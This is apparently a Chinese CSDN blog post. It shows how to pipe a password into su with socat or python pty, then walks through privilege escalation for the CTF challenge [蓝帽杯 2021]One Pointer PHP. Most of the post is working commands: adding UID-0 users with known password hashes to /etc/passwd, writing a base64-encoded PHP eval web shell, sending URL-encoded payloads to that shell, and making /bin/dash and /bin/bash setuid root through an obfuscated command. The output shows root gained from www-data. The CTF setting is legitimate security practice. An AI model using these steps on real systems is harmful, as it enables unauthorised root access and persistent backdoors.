linux su自动输入密码 使用socat

已于 2022-05-27 15:04:41 修改
阅读量5.2k 收藏
点赞数 1
文章标签: linux bash 运维
于 2022-04-28 23:19:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29060627/article/details/124485955
版权 

  buu ctf web 第6页: [蓝帽杯 2021]One Pointer PHP   

一般情况下,使用su(从低级的普通用户切换至root)切换用户需要手动输入密码

借助socat(360KB大小)工具,可以自动完成.

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

这里使用的是socat静态编译版

SHA1:F1A4ABD70F8E56711863F9E7ED0A4A865267EC77

su - tee

#需要手动输入密码

方法一:需要两次命令

/tmp/socat -v exec:"su - tee",pty unix-l:/tmp/ba2ba   
/tmp/socat -v unix:/tmp/ba2ba exec:'echo -e "123456\nid\nchmod u+s /bin/bash\nexit"'

方法二:一步到位

​/tmp/socat -v -t4 -d exec:"su - tee",pty exec:'bash -c "echo${IFS}-e${IFS}-n${IFS}\"123456\\\rid\\\rchmod${IFS}u+s${IFS}/bin/dash\\\rexit\\\r\";"  ',pty

使用的socat版本为:

xxx$ ./socat -V
socat by Gerhard Rieger - see www.dest-unreach.org
socat version 1.7.3.0 on Jun 16 2015 21:24:31
   running on Linux version #202112141049 SMP Tue Dec 14 11:54:51 UTC 2021, release 4.19.221-0419221-generic, machine x86_64

使用python版:

cp /etc/passwd /etc/passwd.bak
tail /etc/passwd
echo "tee:\$1\$123456\$wOSEtcyiP2N/IfIl15W6Z0:229:2:toor:/tmp:/bin/bash" >>/etc/passwd 
echo "yes:\$1\$123\$EKWAR30..wEKERDtzOQUv/:200:2:toor:/tmp:/bin/bash" >>/etc/passwd 
tail /etc/passwd
tee@out:~$  (sleep 0.5;echo 123456;echo id;echo exit;sleep 0.5;echo exit;) |python -c 'import pty;pty.spawn(["bash","-c","su - tee"])'
Password: 
tee@out:~$ id
uid=229(tee) gid=2(bin) groups=2(bin)
tee@out:~$ exit
logout
tee@out:~$ 
tee@out:~$  (sleep 0.5;echo yes;echo id;echo exit;sleep 0.5;echo exit;)|python -c 'import pty;pty.spawn(["bash","-c","su - yes"])'
Password: 
yes@out:~$ id
uid=200(yes) gid=2(bin) groups=2(bin)
yes@out:~$ exit
logout
tee@out:~$

在  [蓝帽杯 2021]One Pointer PHP    环境下:

在使用蚁剑可以管理上的情况:使用蚁剑的[虚拟终端]功能

提示:可以使用蚁剑插件 [绕过disable_functions] 里最后一项: [PHP7_UserFilter],得到虚拟终端

第一步: 启动带suid的php进程(在蚁剑的[虚拟终端]直接输入,无需编码)

php -n -S 127.0.0.1:65432 -t /tmp -d enable_dl=On -d extension_dir='/tmp/' 2>&1 |tee -a /tmp/p3log  

/tmp目录写shell

echo PD89ZXZhbCgkX1JFUVVFU1RbM10pOyAg|base64 -d|tee /tmp/1.php

测试shell

curl -v -o-  "http://127.0.0.1:65432/1.php?3=print_r%289981%29%3B"

第二步: 增加用户tee,用户id是0,也就是和root用户一样的权限

root@out:/tmp# cat /var/www/html/1.php 
8<?=eval($_REQUEST[3]);?>
root@out:/tmp# cat /tmp/1.php 
8<?=eval($_REQUEST[3]);?>
root@out:/tmp#

# curl -v -o- "http://127.0.0.1:65432/1.php?3=file_put_contents('/etc/passwd','tee:$1$123456$wOSEtcyiP2N/IfIl15W6Z0:0:0:toor:/tmp:/bin/bash'.PHP_EOL,FILE_APPEND);"

在蚁剑的[虚拟终端]需要编码:

curl -v -o- "http://127.0.0.1:65432/1.php?3=file_put_contents%28%27%2Fetc%2Fpasswd%27%2C%27tee%3A%241%24123456%24wOSEtcyiP2N%2FIfIl15W6Z0%3A0%3A0%3Atoor%3A%2Ftmp%3A%2Fbin%2Fbash%27.PHP_EOL%2CFILE_APPEND%29%3B"

运行完毕后,/etc/passwd里已经有tee这个超级用户了

验证:

curl -v -o- "http://127.0.0.1:65432/1.php?3=readfile%28%27%2fetc%2fpasswd%27%29%3b"

第三步:通过蚁剑文件管理器上传socat至/tmp目录,并给0744的权限,使其可以在www-data的权限下执行.  

第四步:

在蚁剑的[虚拟终端]需要编码:

curl -v -o- "http://127.0.0.1:65432/1.php?3=pclose%28popen%28%27%28%28%2Ftmp%2Fsocat%20-v%20-t4%20-d%20-d%20-d%20-d%20exec%3A%22su%20-%20tee%22%2Cpty%20exec%3A%22bash%20-c%20echo%5C%24%7BIFS%7DZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi%7Cbase64%5C%24%7BIFS%7D-d%7Cbash%22%2Cpty%29%26%29%26%27%2C%27r%27%29%29%3B"

解码后是:

curl -v -o- "http://127.0.0.1:65432/1.php?3=pclose(popen('((/tmp/socat -v -t4 -d -d -d -d exec:"su - tee",pty exec:"bash -c echo\${IFS}ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi|base64\${IFS}-d|bash",pty)&)&','r'));"

怕csdn转义:我用代码段再复制一份,如下:

curl -v -o- "http://127.0.0.1:80/1.php?3=pclose(popen('((/tmp/socat -v -t4 -d -d -d -d exec:"su - tee",pty exec:"bash -c echo\${IFS}ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi|base64\${IFS}-d|bash",pty)&)&','r'));"

ZWNobyAgLWUgIC1uICIxMjM0NTZccmlkXHJjaG1vZCB1K3MgL2Jpbi9kYXNoXHJub2h1cCBzbGVlcCAzOTgmXHJleGl0XHIi 解码后是:

echo  -e  -n "123456\rid\rchmod u+s /bin/dash\rnohup sleep 398&\rexit\r"

也就是自动输入用户tee的密码123456,并且给/bin/dash加suid权限,再后台运行一个sleep 398作为观察成功与否的标志.最后再退出su命令,注意su命令识别\r而不是\n 作为回车.


 


(www-data:/var/www/html) $ ls -al /bin/?ash

-rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

-rwsr-xr-x 1 root root  121464 Jan 17  2019 /bin/dash

(www-data:/var/www/html) $ 

(www-data:/var/www/html) $ /bin/dash -p -c id

uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

(www-data:/var/www/html) $ /bin/dash -p -c 'chmod u+s /bin/bash'

(www-data:/var/www/html) $

(www-data:/var/www/html) $ /bin/dash -p -c 'chmod 4755 /bin/bash'

(www-data:/var/www/html) $ 

(www-data:/var/www/html) $ ls -al /bin/?ash

-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

-rwsr-xr-x 1 root root  121464 Jan 17  2019 /bin/dash

(www-data:/var/www/html) $ 

安河桥北2025
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux用户自动输入密码,Linux自动输入密码登录用户
weixin_39540744的博客
04-29 1828
每次进去Linux系统,都有切换root用户,输入密码很麻烦,所以就写了一个小脚本,自动输入密码,登录到root用户,1,首先检查一些是否安装了expectroot@wuzs:/home/wuzs# whereis expect expect: /usr/bin/expect /usr/shar...
sudo 提权时自动输入密码
热门推荐
imilano的博客
12-11 1万+
问题描述 有这么一个场景:我需要使用 sudo 提权来执行一条命令,可能是打开一个常用的APP,或者是经常需要 pacman进行系统更新。那么,问题来了,由于这个APP我经常使用,而使用sudo时每次都需要输入密码,显然过于麻烦,那么,有没有什么办法可以自动填充密码呢? 嗯哼,办法是有的。 解决方案 目前找到两种解决方案,方案一亲测有效,方案二未试过,仅做记录。 方案一 有的应用自带选项,可以直接...
sudo 自动输入密码的脚本 alias别名
a925907195的专栏
09-15 2905
【alias简介】 alias 命令用于定义一个命令的简写格式,例如,alias lsproc='ls -l /proc',其中定义了一个新的命令lsproc,以后当输入lsproc的时候,都会执行ls -l proc,显示proc的目录内容 为了使alias永久生效,可以将定义写在 ~/.bashrc 中 vim ~/.bashrc 添加:alias lsproc='ls -
linux】ssh 远程执行命令自动输入密码方式 sshpass
最新发布
草根上的须子
04-09 944
需要注意的是,使用 sshpass 存在一定的安全风险,因为密码会以明文方式传递,容易被恶意程序截获。因此,在使用 sshpass 时,应尽可能避免将密码保存在脚本中,或者将其保存在安全加密的文件中。需要注意的是,使用 sshpass 可能会存在一定的安全风险,因此在使用时需要谨慎考虑。使用上述命令后,sshpass 将会自动完成 SSH 登录过程,而无需手动输入密码。对于我自己而言的话,用的最爽的还是使用 sshpass+alfred 一键登录,先安装 sshpass,然后使用命令。
Linux命令行自动输入密码
dawn_chen121的博客
12-10 4559
su echo "password" | sudo -S netstat -tlnp
linux切换用户su自动输入密码,Linux切换用户出现【su:命令鉴定故障】问题&修改的密码位数必须大于8位的问题...
weixin_32568295的博客
04-28 2690
一、切换到普通用户出现 su:命令鉴定故障创建用户设置好密码后,从root用户进入普通用户是不需要输入密码的,但是我切换到另一个普通用户,进行普通用户之间的切换的时候,出现了【su:命令鉴定故障】。最开始我以为是我密码错误,后来改,也怎么都不对。我查到说出现这个问题重启一次就好了,但是重启后仍然无法解决,用到的方法是使用sudo su username用这条语句会让输入root密码,相当于说是...
一个expect su实现输入su命令之后自动填写密码的功能
Zach-Zona的博客
07-30 7810
一个expect su实现输入su命令之后自动填写密码的功能
Linux实现su切换用户的时候,强制输入密码
Brave_heart4pzj的博客
10-04 1759
vi /etc/pam.d/su 在第一行auth sufficient pam_rootok.so前面加上"#"号 保存退出 即可
CentOS 6.5 shell中su切换自动输入密码
weixin_34001430的博客
12-25 525
yum -y install expectlogin as normal user:vi su.exp#!/usr/bin/expectset timeout 30spawn su -expect "Password:"send "root-pass\r"interactchmod +x su.exp./su.exp 转载于:https://blog.51cto.c...
linux-socat实现端口转发_socat_linux_UbuntuLinux_
09-29
ubuntu系统 linux环境下的socat实现端口转发功能 包括客户端和服务端
Linux串口转网络,linux下socat命令实现网络转发串口数据
04-30
Linux串口转网络,linux下socat命令实现网络转发串口数据
linux脚本命令sudo 不手动输入密码回车,sudo命令直接携带密码
01-20
如果没有给普通用户配置过 NOPASSWD,那么每次非root用户在命令行终端执行需要root权限的操作时都需要需要密码然后回车,在一般情况下没什么问题,但是如果在脚本中就不行了。 如果希望在脚本中执行一个需要输入密码后回车的命令,我们可以使用管道 echo 密码 | sudo 命令 示例,如下 [admin@BizMsTestAlpha test]$ docker ps Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get ht
用expect 实现切换用户时自动输入密码.txt
09-03
昨天一个网友问如何能够将输入密码的工作在shell里面自动完成,研究了一下,发现这种交互式的工作,普通的shell实现不了,据说可以借助expect来搞定,所以初步学习了一下expect,成果和大家分享一下: 应用一: 实现从普通用户“test”切换到root用户,自动输入root的密码,不用在终端提示符下执行密码输入操作。 步骤: (1)vi autosu.sh (2)#! /usr/bin/expect -f //指定expect工具的路径,如果不清楚具体路径,可以用"which expect"命令来查看。 spawn su - // 在expect 中用"spawn"关键字来调用命令“su - ” expect ":" //在执行了su - 命令之后,提示输入密码的提示符。例如你在执行了su - 命令之后,终端里面会出现提示“口令:”,那么你就可以在这里写expect ":",或者expect -exact "口令:" send "rootpasswd\r" //这里expect用send将你的root密码自动输入到上面的提示符之后。 interact //操作完成。 注意:这里强调一下执行脚本时要注意的地方,不能按照习惯来用sh ***.sh来这行expect的程序,会提示找不到命令,因为expect用的不是bash所以会报错。执行的时候直接./***.sh就可以了。~切记! 应用二: 从普通用户切换到root之后,执行“ls”操作,调用执行aaa.sh,返回执行结果,间隔10S。 #/usr/bin/expect -f spawn su - // 在expect 中用"spawn"关键字来调用命令“su - ” expect ":" //在执行了su - 命令之后,提示输入密码的提示符。例如你在执行了su - 命令之后,终端里面会出现提示“口令:”,那么你就可以在这里写expect ":",或者expect -exact "口令:" send "rootpasswd\r" //这里expect用send将你的root密码自动输入到上面的提示符之后。 expect "#" //当遇到提示符以#结尾时,即为root权限时; send "ls\r" //expect 用spend方法调用ls 命令,并且回车(“\r”) expect "#" send "sh aaa.sh\r" //调用sh aaa.sh,即执行一个脚本文件aaa.sh。 expect "#" send "echo $?\r" sleep 10 interact
linux rabbitmq 依赖 socat
06-08
linux rabbitmq 依赖 socat
socat 使用手册
01-08
7.3 典型使用 7 7.3.1 连接目标 7 7.3.2 反向连接 7 7.3.3 向远处端口发数据 7 7.3.4 本地开启端口 7 7.3.5 执行bash的完美用法 8 7.3.6 文件传递 8 7.3.7 转发 8 7.3.8 重定向 9 7.3.9 读写分流 10 7.3.10 通过...
linux下socat源码包
01-08
socat-1.7.2.4.tar.gz
su切换用户密码自动输_uniapp框架微信小程序自动保存用户密码案例
weixin_36134015的博客
12-31 458
念念不忘必有回响是假,枕边书,怀中猫,意中人是假;爱而不得,山海不可平才是事实;唠叨一会uni-app框架自动保存密码也是在实际中使用到的知识点,微信小程序用户可不用频繁输入账户密码;原理是uni.setStorage缓存,以及uni.clearStorage清楚密码,v-model获取输入框内容;步骤1.新建一个uni-app项目2.添加2个字段,因为我们是有账户和密码两条数据,为了方...
linuxsu密码,linux下记录su密码的代码
weixin_29823011的博客
05-05 814
/** kpr-fakesu.c V0.9beta167 ;P* by koper ** Setting up:* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c* admin@host:~$ mv .su /var/tmp/.su* admin@host:~$ cp .bash_profile .wgetrc* admin@host:~$ e...
linux su 如何带密码,Linux系统中root用户使用su命令切换为普通用户时需要提供该用户的密码。...
weixin_39640520的博客
05-11 851
_什么叫瓦斯涌出的分源治理?业主委员会不可以从事什么活动?关于控制环境的说法不正确的是()。广播的语言名词解释()及以下管技人员,离岗待退期间按原岗绩工资标准执行。()及以下管技人员,离岗待退期间按原岗绩工资标准执行。患者最近有口渴、多尿、消瘦病史,空腹血糖11.2mmol/L,则最佳治疗方案()SF开关检修工作结束后,检修人员应()电解装置中氢气湿度控制标准为()g/NmH。船舷侧板与船底板交接...
linux离线安装socat
12-13
以下是在Linux离线安装socat的步骤: 1.从socat的官方网站(http://www.dest-unreach.org/socat/)下载socat的源代码压缩包。 2.将压缩包复制到Linux系统中,例如复制到/home/user目录下。 3.解压缩源代码压缩包...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值